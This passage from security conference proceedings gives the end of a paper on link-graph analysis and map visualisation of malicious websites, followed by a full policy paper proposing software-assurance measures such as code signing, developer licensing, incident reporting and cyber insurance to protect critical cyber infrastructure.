facilitating websites. On the other side, the clustering coefficient of the legitimate websites was<br />

identified to be 0.59, which is more than three times the clustering coefficient of the malicious<br />

websites. This shows that the links among the malicious websites are low in number.<br />

63


Manoj Cherukuri and Srinivas Mukkamala<br />

Figure 16: Screenshot of the website medicalmarijuanablog.com<br />

6. Link visualization<br />

Links were visualized on the Google maps using the Google maps application programming interface<br />

(API). The pre-computed geographic locations of the websites using the IP address to location<br />

database were used to plot them on to the Google maps. Link visualization provides an interactive<br />

means for analyzing the patterns followed by the links among different websites. The interactive map<br />

helps in zooming and displays the name of the website on clicking the marker.<br />

In Figure 17, the malicious websites and the facilitating websites are marked with red and blue<br />

markers respectively. The red lines represent the bidirectional links, the green lines represent the<br />

incoming link with respect to the facilitating website and the blue lines represent the outgoing link with<br />

respect to the facilitating website. The lines going out from one extreme are connected through the<br />

other extreme. From the above two images it is evident that the links are traversing among the<br />

malicious domains across different countries presenting the fact that the attackers are not limiting the<br />

hosting of their malicious websites either to a hosting service or to a country.<br />

In Figure 18, the red lines represent the bi-directional links and the green lines represent the<br />

unidirectional links. In Figure 19, on selecting a domain all the links associated with malicious<br />

domains are depicted on the map. The green line represents an incoming link with respect to the<br />

selected domain, the red line represents a bidirectional link and the blue line represents the outgoing<br />

link with respect to the selected domain.<br />

7. Conclusion<br />

In this work we presented some interesting heuristics of the malicious websites that help in enhancing<br />

the mechanisms used for the detection of malicious websites.<br />

We identified the behavior of the malicious websites with respect to their indegrees and outdegrees.<br />

We defined an equation that fits to the behavior of the indegree and the outdegree of the malicious<br />

websites, which followed the power law with exponential cutoff.<br />

Compared the outdegree of the malicious websites with that of the legitimate websites and concluded<br />

that the malicious websites tend to have low outdegree compared to the legitimate websites.<br />

We computed the clustering coefficient of the malicious websites and compared to that of the<br />

legitimate websites and showed that the linking among the malicious websites is low compared to that<br />

of the legitimate websites.<br />

Our results during the analysis showed that the attackers are using legitimate websites with high<br />

Google page rank as the means for directing traffic towards the malicious websites.<br />

64


Manoj Cherukuri and Srinivas Mukkamala<br />

We presented a new way of visualizing the links on the map using their geographical locations and<br />

showed the fact that the attackers are not limiting the hosting of their malicious websites to a country<br />

or a hosting service but are spread all over.<br />

Figure 17: Visualization of malicious websites connected through the facilitating websites<br />

Figure 18: Visualization of malicious domains linked to other malicious domains<br />

65


Manoj Cherukuri and Srinivas Mukkamala<br />

Figure 19: Shows customized link visualization where domains exist in the left pane<br />

8. Future work<br />

We are planning to perform similarity analysis among different malicious websites to identify clusters<br />

of malicious sites under one control. This helps in understanding the behavior and the characteristics<br />

of the groups of attackers. We are also planning to extend this study using content analysis of the<br />

malicious webpages.<br />

Acknowledgements<br />

We would like to thank our data sources PhishTank, Malware Domain Blocklist, MalwarePatrol,<br />

Malware Domain List, joewein.de LLC. and abuse.ch.<br />

References<br />

“Beautiful Soup.” (2010), Crummy [Online], 09 Apr, Available: http://www.crummy.com/software/BeautifulSoup<br />

[01 Jun 2010].<br />

Chakrabarti, D. and Faloutsos, C. (2006) “Graph Mining: Laws, Generators and Algorithms”, ACM Computing<br />

Survey, vol. 38, no. 1.<br />

Cheng, J. (2008) "Symantec: Underground Cybercrime Economy Booming.", Ars Technica [Online], 25 Nov,<br />

Available: http://arstechnica.com/security/news/2008/11/symantec-underground-cybercrime-economybooming.ars<br />

[10 Aug 2010].<br />

“Clustering Coefficient.” (2010), Wikipedia Foundation [Online], 29 Jul, Available:<br />

http://en.wikipedia.org/wiki/Clustering_coefficient#Global_clustering_coefficient [07 Aug 2010].<br />

Cova, M., Kruegel, C., and Vigna, G. (2010) “Detection and Analysis of Drive-by Download Attacks and Malicious<br />

JavaScript Code”, WWW 2010 - 19th International World Wide Web <strong>Conference</strong>, North Carolina (USA).<br />

“December 2009 Web Server Survey.” (2009), Netcraft [Online], 24 Dec, Available:<br />

http://news.netcraft.com/archives/2009/12/24/december_2009_web_server_survey.html [10 Aug 2010].<br />

Kalafut, A.J., Shue, C.A. and Gupta, M. (2010) “Malicious Hubs: Detecting Abnormally Malicious Autonomous<br />

Systems”, IEEE Infocom Mini-<strong>Conference</strong>, California (USA).<br />

Luvender, R.V. (2010) “Fraud Trends in 2010: Top threats from a growing underground economy.”, A First Data<br />

White Paper.<br />

Ma, J., Saul, L.K., Savage, S., and Voelker, M.G. (2009) “Beyond Blacklists: Learning to Detect Malicious Web<br />

Sites from Suspicious URLs”, Knowledge Discovery and Data Mining, Paris.<br />

Provos, N. (2010) “Malware Statistics Update.”, Google Online Security Blog [Online], 25 Aug, Available:<br />

http://googleonlinesecurity.blogspot.com/2009/08/malware-statistics-update.html [10 Aug 2010].<br />

Stevens, K. (2010) “The Underground Economy of Pay-Per-Install Business”, Black Hat Technical Security<br />

<strong>Conference</strong>, Las Vegas (USA).<br />

“Top Sites.” (2010), Alexa Internet Inc. [Online], 10 Jul, Available: http://www.alexa.com/topsites [10 Jul 2010].<br />

Watts, D.J. and Strogatz, S.H. (1998), “Collective dynamics of ‘small-world’ networks”, NATURE, Vol 393, pp<br />

440-443.<br />

66


Manoj Cherukuri and Srinivas Mukkamala<br />

“World Internet Usage and Population Statistics.” (2010), www.internetworldstats.com [Online], Available:<br />

http://www.internetworldstats.com/stats.htm [10 Aug 2010].<br />

Zhuge, J., Holz, T., Song, C., Guo, J., Han, X. and Zou, W. (2007) “Studying Malicious Websites and the<br />

Underground Economy on the Chinese Web”, Workshop on Economics of Information Security,<br />

Pennsylvania (USA).<br />

67


The Strategies for Critical Cyber Infrastructure (CCI) Protection<br />

by Enhancing Software Assurance<br />

Mecealus Cronkrite, John Szydlik and Joon Park<br />

Syracuse University, USA<br />

micronkr@syr.edu<br />

jaszydli@syr.edu<br />

jspark@syr.edu<br />

Abstract: Modern organizations are becoming more reliant on complex, interdependent, integrated information<br />

systems. Key national industries are the critical infrastructure (CI) and include telecommunications, energy,<br />

healthcare, agriculture, and transportation. These CI industries are becoming more dependent on a critical cyber<br />

infrastructure (CCI) of computer information systems and networks, which are vital to the continuity of the economy.<br />

Organized attackers are increasing in number and power with more powerful computing resources that increasingly<br />

threaten CCI software systems. The motivations for attacks range from terrorism, fraud, identity theft,<br />

espionage, and political activism. Government and industry research have found that most cyber attacks exploited<br />

known vulnerabilities and common software programming errors. Software publisher vendors have been<br />

unable to agree or implement a secure coding standard for two main reasons. The on-technical consumer is ill<br />

informed to demand secure quality products. These current conditions perpetuate preventable risk. As a result,<br />

software vendors do not implement security unless specifically required by the customer, leaving many systems<br />

full of gaps. Since most of exploited vulnerabilities are preventable, the implementation of a minimum level of<br />

software quality is one of the key countermeasures for protecting the critical information infrastructure. Government<br />

and industry can improve the resilience of the CI in an increasingly interdependent network of information<br />

systems by protecting the CCI with stronger software assurance practices and policies and strengthening product<br />

liability laws and fines for non-compliance. In this paper we discuss the increasing software and market risks to<br />

CCI and address the strategies to protect the CCI through enhancing software assurance practices and policies.<br />

Keywords: critical cyber infrastructure, secure programming quality, software assurance<br />

1. Introduction<br />

The first major Internet attack in 1988 by the Morris worm was a bad prank gone awry, but made it<br />

clear, that for the first time, cyber security threats could escape physical boundaries. Cyber threats<br />

could now spread rapidly through the Internet and impact different organizations and countries simultaneously.<br />

In 2001, Code Red and Nimda were the first attacks to operate disrupt the commercial<br />

internet affecting many business and ecommerce sites. (Gelbstien & Kamal, 2002) Next, the 2003<br />

SQL Slammer worm caused major disruption of commercial and banking systems this attack used a<br />

weakness that already had a solved by patch but had not been applied to enough of the consumer<br />

base to cause damage to other companies because of internet slowdown. In 2003, the Sobig virus<br />

temporarily shut down 23,000 miles of a railway system, arguably the first successful CI attack,<br />

(McGuinn, 2004). However, the 2010 Stuxnet SCADA attack was undoubtedly the first of its kind to<br />

disrupt CI operations. Its entry point was ultimately attributable to a hard coded SQL administrative<br />

password (Falliere, et. al. 2010), a well-known bad development practice. In the twenty-two years<br />

since Morris, damage from cyber security incidents have grown in frequency and impact.<br />

Over the past ten years, especially, the numbers of successful CCI attacks have been increasing. The<br />

profile of the creators of malware programs have changed since the days of the Morris worm. Today<br />

malware is being developed and used primarily by criminal actors for financial gain and potentially by<br />

other actors seeking to cause market instability and economic damage.<br />

In the past computing attacks required access to high-end computing which was limited to wellfunded,<br />

established entities that could support large data centres and computer clusters. However,<br />

the introduction of the botnet has created a black-market for spam sending, decryption large-scale<br />

brute force cracking activities, and Distributed Denial of Service (DDoS) attacks for hire for very cheap<br />

prices scaled according to the target size. (OCED, 2008)<br />

A “botnet” is criminal network of distributed computing, created by compromising victim devices, usually<br />

through malware that exploits existing software weaknesses, and makes them a slave or “zombie”<br />

to the larger criminal computer network called a “botnet.” As the computing power of non-secured<br />

internet-connected devices increases so does the collective computing power of botnets. It is typical<br />

68


Mecealus Cronkrite et al.<br />

to see botnets with over ten thousand nodes or hosts at their command. (US-CERT, 2005) Very large<br />

botnets such as Conflicker or Mariposa controlled millions of nodes.<br />

Botnets can also do any distributed application criminals can imagine these are “Criminal Clouds” already<br />

active and operational years ahead of industry. These rouge ad-hoc botnets have greatly<br />

strengthened the computing arsenal of non-state criminal and terrorist organizations. (Council of<br />

Europe Counterterrorism Task Force, 2007) Motivated attackers now have access to cheap, large<br />

scale “stolen” computing grids. As a result, all the baseline security presumptions associated with securing<br />

or encrypting data and the securing the data’s availability over the internet has greatly weakened.<br />

2. Background<br />

2.1 The relationship between the CI and the CCI<br />

Figure 1: CCI IS stack by security control and influence<br />

The US Department of Homeland Security Presidential Directive-7 (HSPD-7) defines the critical infrastructure<br />

(CI) by the importance of an industry to society and the economy, e.g. transportation, agriculture,<br />

energy, healthcare, telecommunications, and emergency services. The critical cyber infrastructure<br />

(CCI) represents the information systems that support the operation of these key needs.<br />

DHS’ National Cyber Command Division (NCCD) is responsible for protecting the CCI in the US, and<br />

focuses on helping the CI industries, “conduct vulnerability assessments, develop training, and educate<br />

the control systems community on cyber risks and mitigation solutions.” (Mcurk Testimony, 2010)<br />

We can layer the components that intersect in a malware attack by their ability to control or influence<br />

security processes, as in Figure 1. Developer knowledge and skill are the final arbiters of quality code<br />

with the influence of the software publisher’s development methodology supervising those decisions.<br />

Therefore, the ability to control and change the behaviour of security depends on the quality practices<br />

of the software publisher and their developers. (Wang, et. al, 2008) The responsibility for security<br />

software rests with the company that publishes software code, and the developers that participated in<br />

IS system development because their knowledge of the system exceeds other spheres of influence.<br />

2.2 The increasing risk to Critical Cyber Infrastructure (CCI)<br />

Losses attributable to coding defects or weak configuration have increased in all industry sectors. The<br />

impact from cyber attacks grows as the dependence on CCI systems designed with poor practices<br />

continues. Up until the 2010, Stuxnet attack critical infrastructure systems were ‘siloed’ or separated<br />

69


Mecealus Cronkrite et al.<br />

from possible internet damage. Stuxnet thwarted this final defence and achieved an attack through a<br />

series of weaknesses in software practices. (Falliere, et. al. 2010)<br />

Malware can get into vulnerable systems without detection from anti-virus measures because it exploits<br />

trusted software. Bad programming practices result in most of the preventable malware attack.<br />

(Goertzel et. al.2007) The Software Engineering Institute estimates that 90 percent of reported security<br />

incidents result from exploits against defects in the design or code of software. (Mead, et. al,<br />

2009) The defects exploited, stemmed from a relatively small number of known programming errors<br />

such as failing to check data input before adding it to a database, hard-coding, or developing applications<br />

dependent on over privileged accounts to run. (MITRE & SANS, 2010)<br />

Malware has this additional hidden impact cost to the economy because the true costs of the “zeroday”<br />

malware effect are extremely difficult to measure since they are undetectable. When software<br />

with vulnerabilities releases on its “zero-day,” during this time attackers activities cannot be blocked or<br />

detected. The delay between the developer knowing and making a fix available to when administrators<br />

install it on all affected systems can lag for years. Even with patches available, the zero-day risk<br />

is still a threat to CI when organizations or consumers are unaware of the risk or patch. Patching is a<br />

failed program of reactive repairs.<br />

3. Software risks to the Critical Cyber Infrastructure (CCI) and proposed mitigations<br />

To assess potential damage caused by cyber threats, and find ways to strengthen the resilience and<br />

defence of the CCI. “Stuxnet demands that we look not just to the security community but also to the<br />

system designers, planners, engineers, and operators of our essential technology and physical infrastructures.”<br />

(Assante, 2010)<br />

One of the first rules of defence is deterrence, so approaches for enhancing the current level of CCI<br />

defence are going to be through fixing the preventable errors. Software assurance is a way of deterrence<br />

because it is the practice of providing high levels of software quality free of known defects.<br />

(Wang, et. al, 2008) Techniques such as coding standards can improve deterrence by making simple<br />

attacks fail and increase the resources needed for successful attacks.<br />

3.1 Mitigation: Developer non-repudiation<br />

By requiring CI software developers and publishers module code signing creates an accountability<br />

process. To implement code signing a system similar to the web domain registration system, with a<br />

‘WhoIS’ style lookup, could be combined with a Public Key Infrastructure (PKI) like the SSL registration<br />

systems. Developers can start to sign all code modules or apps to an individual developer and<br />

publisher. Major popular IDE can also support a PKI plug-in system to support code-signing development.<br />

Certificates for code signing are already a plug-in in many IDEs.<br />

Developer abstraction can be handled at a level similar to engineering, for example, if the senior developer<br />

signs the code, then they are accountable for security issues later, just like an architect or<br />

engineer is. The company management should sign the final code again so they also have tangible<br />

accountability for the software quality. Similar to the US Sarbanes-Oxley (SOX) law requires the<br />

CEO/CFO to sign off on the accuracy public financial records<br />

Customer systems could be configured to disallow anonymous code to run. By forcing all software to<br />

present credentials to run we can start to establish a trace for code that is working or failing.<br />

3.2 Mitigation: Create development tools to assist and automate security<br />

The government and major Integrated Development Environment IDE developers should collaborate<br />

to create security test suites to identify common errors automatically, even to the complier level. IDEs<br />

should check code similar to how W3C validation engines corrected for common HTML errors. This<br />

will help programmers improve without additional cost. IDE automated test tools will transition legitimate<br />

developers and publishers to comply with that new level of quality. With free tools for checking<br />

code, code compliance becomes easier at all layers of development, the success of this approach<br />

being W3C, and the rare occurrence today of unreadable HTML pages. HTML code validation is now<br />

70


Mecealus Cronkrite et al.<br />

trivial. Today most web code is generated in content management frameworks so the workload has<br />

switched from the individual developer to the tools.<br />

3.3 Mitigation: Professionally license CCI software developers and publishers<br />

Many vital economic sectors in the physical world have accredited professionals to create a culture of<br />

quality and security. Electricians, architects, and engineering professionals are certified and accredited<br />

to practice because their quality of work affects public safety and infrastructure. However, unlike<br />

other CI professions there are no legally recognized accreditation processes for IT. Anyone can develop<br />

software without liability for the behaviour of that software. IT workers design, construct, and<br />

manage applications, databases, and network systems for all types of public trust transactions. They<br />

do this all without the professional support systems.<br />

We can relate the safe and security measures used in other professions as a model for software assurance.<br />

Like these conventional professions, IT professions are also responsible for major portions<br />

of the critical infrastructure in the cyber world. “[IT] practitioners can produce results as inconvenient<br />

or dangerous as any medical or legal mishap, without their having the amount of regulation or informed<br />

public scrutiny which both those areas command.” (Wikes, 1997: 88) By leveraging the existing<br />

professional frameworks that supports other CI professions such as accounting, engineering, and<br />

medicine, we can adopt policies and technologies that support improved public safety. Existing technology<br />

systems can create accountability for the software industry and transparency for its customers.<br />

While academic training and apprenticeship still provides the basis of disseminating knowledge of<br />

good models and best practices, the professional boards and licenses should support these practices<br />

with ethics. Certification and licensing options have the potential of legitimizing IT as a profession by<br />

improving the quality of output. (Wilkes, 1997) These certifications still face implementation challenges<br />

as there are numerous standards and organization bodies in the software industry, none of<br />

them have any enforcement capability that makes adoption of any minimum standard extremely difficult.<br />

Key industry organizations such as ACM and IEEE, and others that lead the professionalism of<br />

the industry only have voluntary membership status which makes their effectiveness challenging.<br />

Any application that supports the CI should have certified developers and publishers licensed to code<br />

for the CCI systems. By differentiating, then the consumer will get security accountability built into<br />

systems. The market will begin to shift to demand the same levels of quality in other industries, which<br />

will encourage software developers to distinguish themselves in the marketplace. This would also<br />

raise the barriers to entry on the software development market and ease the pressure on existing<br />

competitors who are able to adopt assurance practices, which will benefit both the software industry<br />

and the consumer.<br />

4. Market risks preventing software quality and security and proposed mitigations<br />

The current highly competitive commercial software marketplace does not have the incentives or repercussions<br />

to implement standards. In many situations, security is always an optional add-on. A<br />

common business argument to the developer is to ‘worry about security later’. However, this would<br />

not occur if a mechanic had reported that a vehicle was unsafe. There is widespread lack of individual<br />

autonomy; IT workers feel that they cannot prioritize quality and safety ahead of production speed and<br />

‘agility’ within their organization due to business pressures. With government supported licensing, the<br />

individual practitioner will be able to gain autonomy and legitimacy for security driven efforts as a matter<br />

of compliance.<br />

The customer is at a disadvantage in market knowledge. Consumers expect that reasonable security<br />

measures but there is no such assurance. Typically, the customer has to require specifically in their<br />

contract specific security measures. If security is not explicitly in the requirements, it is a burden on<br />

the development company to implement it. All estimates for the true cost of security in the system are<br />

wrong from the first unsecured prototype that delivered to the client. The customer is left to learn<br />

about security by taking a risk acceptance posture by default. By accepting unsecure software, they<br />

incorrectly feeding the market an acceptance signal. Without security forced to be “built-in” to the<br />

process, the uninformed consumer does not know to discriminate between secure and non-secure<br />

technologies and demand them accordingly to signal more supply.<br />

71


Mecealus Cronkrite et al.<br />

The “industry knows best” approach for cyber-security is inefficient and a market failure. (Assante,<br />

2010) The public’s level demand for cyber-security is higher than most firms’ individual demand. This<br />

is because the private costs resulting from a cyber-incident are often less than the public’s cost. As an<br />

example, when electronically stored customer credit card information is stolen from a store the financial<br />

institutions are often responsible for the loss not the store that had badly configured security.<br />

4.1 Vulnerability: Cyber incident data is inconsistent<br />

Most industries have no mandatory cyber incident reporting which makes estimating the true impact<br />

of cyber crime difficult to measure. Regular studies performed by the FBI (CSI, 2009), Secret Service,<br />

Verizon (Baker et. al, 2010) and Microsoft (Microsoft SIR, 2010) all use voluntary surveys and data<br />

gathering. However, there are differences in the change in malware rates. The FBI, Microsoft and<br />

Verizon security reports agree that malware attacks are on the risk. However, according to Microsoft’s<br />

SIR report, “Software vulnerabilities…have been on the decline since the second half of 2006,” The<br />

report ascribed this progress to better development quality practices (Microsoft, SIR, 2010) This disparity<br />

is the result of two vastly different data sets that Microsoft and Verizon have used the voluntary<br />

nature of cyber incident responses contributes to these differences. However, all three reports agree<br />

that data is inconsistent due to the lack of a mandatory reporting system.<br />

4.2 Mitigation: Mandate cyber incident reporting<br />

According to a Computer Security Institute survey only a small fraction of organizations that experience<br />

a cyber attack, report it to law enforcement. (CSI, 2009) Firms generally do not favour expanded<br />

mandatory reporting because they do not want bad press, or the public to have a negative perception.<br />

The reluctance is even greater when the firm does not suffer any immediate financial loss. Reporting<br />

these intrusions (crimes) is in the greater interest of society because authorities stand a better chance<br />

of stopping them if they have more information about the threat in general and can learn from emerging<br />

patterns.<br />

To address privacy concerns a reporting system that is similar to U.S. Treasury FINCEN Suspicious<br />

Activity Report (SAR) could be used. Currently, most financial institutions are mandated to report certain<br />

types of suspicious activity using SARs. SARs are kept secret and have tight dissemination standards<br />

and an effective tool in fighting financial crime. A similar reporting system for cyber-attacks<br />

would be equally beneficial. “Disclosure laws” could force software publishers and their customers<br />

that support critical infrastructure to report cyber-attacks and data breaches to DHS. (DHS NIAC,<br />

2009). By mandating reporting, there will be a more accurate picture regarding cyber threats. (Goertzel<br />

et. al.2007) This will help researchers identify weakness, and aid in the apprehension of attackers.<br />

The data collected will help inform actuary tables for insurance firms, and to develop risk analyses.<br />

Cyber crime incident reporting should be required by all CI industries first to gain better knowledge<br />

about the threat malware poses and educate business owners and managers about the financial<br />

and legal implications of improper software assurance processes.<br />

4.3 Vulnerability: Demand for cyber security<br />

Rational firms should use IT risk management to manage cyber security, but, firms often lack the<br />

knowledge and expertise to implement and it is difficult for firms to measure the effectiveness of investments<br />

into cyber security. (Mead, et. al, 2009) This makes it hard to justify expenditures and results<br />

in the general lack of secure programming investment. The public is left with the costs of a cyber-security<br />

incident such as firms that were the target of the cyber incident as well as its clients,<br />

banks or others who feel its negative effects, and include taxpayers if the government responds.<br />

Since the overall damage of a cyber-incident is generally higher for the public, they would rationally<br />

choose to have a higher investment in cyber-security. Unfortunately, the public has little say in what<br />

investment an individual firm decides to make in cyber-security leading to underinvestment in the<br />

eyes of the public. In economic terms, the aggregate private firm’s demand for cyber security is less<br />

than the public’s demand. This is a market failure, which invites regulation or some form of market<br />

correction to rectify this externality.<br />

Figure 2 illustrates a private firm’s efficient level of investment at q1 where there firms demand for<br />

security “D” equals the marginal cost “MC” for each additional investment. . The marginal social benefit<br />

is the public’s demand which equals q* when it crosses the marginal cost line. “q*” represents the<br />

72


Mecealus Cronkrite et al.<br />

socially efficient level of cyber security which is greater than the private level The graph in Figure 2,<br />

shows the public’s demand for security is greater than individual firms.<br />

Figure 2: Demand vs. Investment in cyber security<br />

4.4 Mitigation: Create information systems cyber security insurance market<br />

Data breeches usually have no consequences or fines for the company that lost the customer data,<br />

and even fewer for the development team that wrote the software or configured the servers. A cyber<br />

security insurance market can create an economic incentive for firms to implement better security<br />

standards. To establish the market governments would have to create laws placing partial liability for<br />

cyber attacks on software publishers and operating firms if they negligent by failing to implement sufficient<br />

security standards and practices. (Baer and Parkinson, 2007:50 – 56)<br />

With better cyber incident, reporting research and insurance communities can find common risky behaviour<br />

patterns. Since private insurance companies use actuary tables and measure risk they would<br />

be able to establish scalable cyber security requirements. In exchange for coverage and premium<br />

discounts, insurance companies can require private firms to take reasonable steps to protect their<br />

systems, within a risk management system. Premiums can assign a higher risk to IT security<br />

breaches stemming from programming errors and failure to adopt best practice standards in cyber<br />

security.<br />

Market forces will generate an insurance market that accommodates different sizes of firms. A major<br />

difficulty regarding this policy implementation is to ensure premiums are not too costly for firms to afford.<br />

As a result, it may be necessary for government to cap the amount of damages that a firm may<br />

pay. The government can help establish the cyber insurance market by facilitating reinsurance<br />

through indemnifying catastrophic losses.<br />

4.5 Mitigation: Compliance in U.S Federal IT acquisition security standards (fines)<br />

Government IT acquisition and procurement decisions are unlike private corporations. In private concerns,<br />

shareholder value should ultimately control spending so the implementation of security is profit<br />

goal driven. The US Federal Government has complex goals for the public good, accountability, fairness,<br />

and transparency. However, the majority of CCI is located within the private sector so to encourage<br />

effective standards government has to rely on market forces and voluntary partnerships with<br />

industry. (Golumbic, 2008)<br />

Governments and (CI) systems increasingly dependent on commercially developed software in doing<br />

so they have transferred security risk upstream to the developers. As a result, the US government has<br />

created many of its own models for secure IT acquisition and procurement that either impact system<br />

development processes. For example, NIST Special Publication 800 series, the DOD standard<br />

DIACAP, and Federal Information Security Management Act (FISMA) all are US regulations to deal<br />

73


Mecealus Cronkrite et al.<br />

with security requirements for government information systems. Security rests with the acquisition<br />

policy and contract, vendor management controls that they defined, a non-standard approach.<br />

However, the GAO has found that the federal government overall has major deficiencies information<br />

security. Mainly due to the lack of technical acquisition expertise needed to interpret and apply security<br />

requirements to contracts and the rigor and sustaining efforts required to keep validating vendor<br />

quality. (GAO-09-661T, 2009) Therefore increasing the federal IT workforce and capabilities, DHS<br />

NCCD can start to upgrade and improve the performance of security within the US government. Security<br />

requirements should be equally valued and balanced as e-government requirements in order to<br />

improve CI defence from disasters and attacks. Moreover, adding vendor non-compliance fines in the<br />

government IT acquisition process should increase the attention paid to CI systems.<br />

5. Conclusions and future work<br />

There is a growing relationship between preventable software assurance failures and exposed critical<br />

cyber infrastructure risk. Preventable software defects remain unresolved at the peril of all software<br />

consumers and endanger the cyber infrastructure on which we all rely. The software consumer is uninformed<br />

and cannot self assure that the outsource software they order meets an acceptable standard.<br />

Making the security case clear enough to the public to understand is harder than making the<br />

case to the developer and the business manager through market forces.<br />

The growing black market economy of malware is exploiting the existing known defects in widely distributed<br />

commercial software. Targeting known common software defects is a primary vector to enter<br />

trusted networks and systems. Preventable programming errors make “zombie” slave computers accessories<br />

to organized crimes. The growing criminalisation of cyber attacks is driving the need for<br />

new controls in the previously unregulated software development culture.<br />

Without support, the business will tend to favour of profits over safety. It is the nature of profit motivation.<br />

Firms on their own will not decide to invest the socially optimal amount in cyber security because<br />

it conflicts with their own rational decision making criteria. However, by supported standards it enables<br />

the developer and publisher to mitigate preventable risk.<br />

Improving software assurance practices is one of the key countermeasures for protecting critical infrastructure.<br />

The industry needs to be motivated to encourage accountability and liability on behalf of<br />

the public good by avoiding common errors. This would also raise the barriers to entry on the software<br />

development market and ease the pressure on existing competitors who are able to adopt assurance<br />

practices, while legitimatizing IT as a new profession responsible for entrusted with the public good<br />

defending the critical cyber infrastructure.<br />

The proposed approaches examined a framework of increasing government and private controls on<br />

software quality and software assurance outcomes.<br />

Mandate Cyber Incident Reporting for CI industries to increase transparency and research ability.<br />

Enforce (Fines) for Federal IT Security development Non-Compliance to create better vendor<br />

compliance.<br />

Create better IDE tools that check for common programming errors, to help prevent the programmer<br />

from making common errors, and increase the resilience of the software infrastructure.<br />

Encourage professional licensing and non-repudiation for CCI Developers and Publishers to help<br />

to increase accountability and transparency in the publisher and developer community.<br />

The software industry will not be able to negotiate the safety standards process alone, without some<br />

government assistance. There is a need for standards based software professional accreditation to<br />

ensure the consistent application of basic security programming techniques and data privacy. However,<br />

the industry should not wait for legislation. Software publishers have the ability to seize the momentum<br />

of media awareness and establish accountability for code security within their corps.<br />

Acknowledgements<br />

This work is an extended study of our final team project of IST623 (Introduction to Information Security),<br />

taught by Prof. Joon S. Park, in the School of Information Studies at Syracuse University in<br />

Spring 2010. We would like to thank the class for valuable feedback, insight, and encouragement as<br />

we researched and developed this project during the semester.<br />

74


Mecealus Cronkrite et al.<br />

The views expressed herein are those of the authors and do not necessarily reflect the views of, and<br />

should not be attributed to, the Department of Homeland Security or any of its agencies.<br />

References<br />

Assante, M.J. 2010, November 17. Testimony of Michael J. Assante, President and Chief Executive Officer National<br />

Board of Information Security Examiners of the United States Inc. Before the Senate Committee on<br />

Homeland Security and Governmental Affairs US Senate Hearing on Securing Critical Infrastructure in the<br />

Age of Stuxnet. Washington D.C.<br />

Baer, W.S. & Parkinson, A. 2007, "Cyberinsurance in IT Security Management,” IEEE Security & Privacy, vol. 5,<br />

no. 3, pp. 50-56.<br />

Baker, W., Goudie, M., Hutton, A., Hylender, c.D., Niemantsverdriet, J., Novak, c., Ostertag, D., Porter, c.,<br />

Rosen, M., Sartin, B. & Tippett, P.,United States Secret Service 2010, July 28-last update, 2010 Data<br />

Breach Investigations Report [Homepage of Verizon], [Online]. Available:<br />

http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [2010, 10/20]<br />

Council of Europe Counterterrorism Task Force 2007, Cyberterrorism-the use of the internet for terrorist purposes.<br />

Council of Europe Publishing, Strasbourg Cedex, France<br />

CSI, “14th Annual 2009 CSI Computer Crime and Security Survey” December, 2009, Computer Security Institute<br />

Falliere, N., Murchu, L.O. & Chien, E. 2010, October-last update, w32 Stuxnet Dossier [Homepage of Symantec],<br />

[Online]. Available:<br />

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dos<br />

sier.pdf [2010, 10/20]<br />

GAO May 5, 2009, GAO-09-661T: Testimony before the Subcommittee on Government Management, Organization,<br />

and Procurement; House Committee on Oversight and Government Reform: Cyber Threats and Vulnerabilities<br />

Place Federal Systems at Risk Statement of Gregory C. Wilshusen, Director, Information Security<br />

Issues, GAO, Washington, D.C.<br />

Gelbstein, E. & Kamal, A. 2002, Information insecurity :a survival guide to the uncharted territories of cyberthreats<br />

and cyber-security, 2nd ed, United Nations ICT Task Force and the United Nations Institute for<br />

Training and Research, New York, NY.<br />

Goertzel, K.M., Winograd, T., McKinley, H.L., Oh, L., Colon, M., McGibbon, T., Fedchak, E. & Vienneau, R. 2007,<br />

July 23-last update, Software Security Assurance State-of-the-Art Report (SOAR) [Homepage of Joint endeavour<br />

by IATAC with DACS], [Online]. Available: http://iac.dtic.mil/iatac/download/security.pdf [2010,<br />

10/20].<br />

Golumbic, M.C. 2008, Fighting terror online: the convergence of security, technology, and the law, Springer Verlag,<br />

New York.<br />

McGuinn, M. 2005, October 12-last update, Prioritizing Cyber Vulnerabilities, Final Report and Recommendations<br />

by the Council. [Homepage of DHS-NIAC], [Online]. Available:<br />

http://www.dhs.gov/xlibrary/assets/niac/NIAC_CyberVulnerabilitiesPaper_Feb05.pdf [2010, 10/20] .<br />

Mead, N.R., Allen, J.H., Conklin, A.W., Drommi, A., Harrison, J., Ingalsbe, J., Rainey, J. & Shoemaker, D. 2009,<br />

April-last update, Making the Business Case for Software Assurance [Homepage of Carneige Mellon Software<br />

Engineering Institute], [Online]. Available: http://www.sei.cmu.edu/reports/09sr001.pdf [2010, 10/20].<br />

Microsoft, “Microsoft Security Intelligence Report Volume 9 (Jan 1 2010 - Jun 30 2010)2010”, [Homepage of Microsoft],<br />

[Online]. Available: http://www.microsoft.com/security/sir/default.aspx [2010, 10/20].<br />

McGurk, Sean 2010, Nov.17 Statement for the Record of Seán P. McGurk Acting Director, National Cybersecurity<br />

and Communications Integration Center Office of Cybersecurity and Communications<br />

National Protection and Programs Directorate Department of Homeland Security Before the United States Senate<br />

Homeland Security and Governmental Affairs Committee, Washington, DC November 17, 2010<br />

MITRE & SANS 2010, April 5-last update, CWE/SANS Top 25 Most Dangerous Programming Errors [Homepage<br />

of MITRE], [Online]. Available: http://cwe.mitre.org/top25/ [2010, 10/20].<br />

NIAC, National Infrastructure Advisory Council September 8, 2009, Critical Infrastructure Resilience Final Report<br />

And Recommendations, DHS, Washington, D.C.<br />

OECD, 2008. “Malicious Software (Malware) A Security Threat to the Internet Economy. OECD, Seoul, Korea.<br />

US-CERT, “Build Security In. (n.d.).Key Practices for Mitigating the Most Egregious Exploitable Software Weaknesses.<br />

Software Assurance Pocket Guide Series: Development” Volume II Version 1.3.2009, May 24-last<br />

update [Homepage of DHS-US-CERT], [Online]. Available: https://buildsecurityin.uscert.gov/swa/downloads/KeyPracticesMWV13_02AM091111.pdf<br />

[2010, 10/20].<br />

US-CERT Multi-State Information Sharing and Analysis Center and United States Computer Emergency Readiness<br />

Team (US-CERT) 2005, May 16-last update, Malware Threats and Mitigation Strategies [Homepage of<br />

DHS-US-CERT], [Online]. Available: http://www.us-cert.gov/reading_room/malware-threats-mitigation.pdf<br />

[2010, 10/20]<br />

Wang, Y., Zheng, B. & Huang, H. 2008, "Complying with Coding Standards or Retaining Programming Style: A<br />

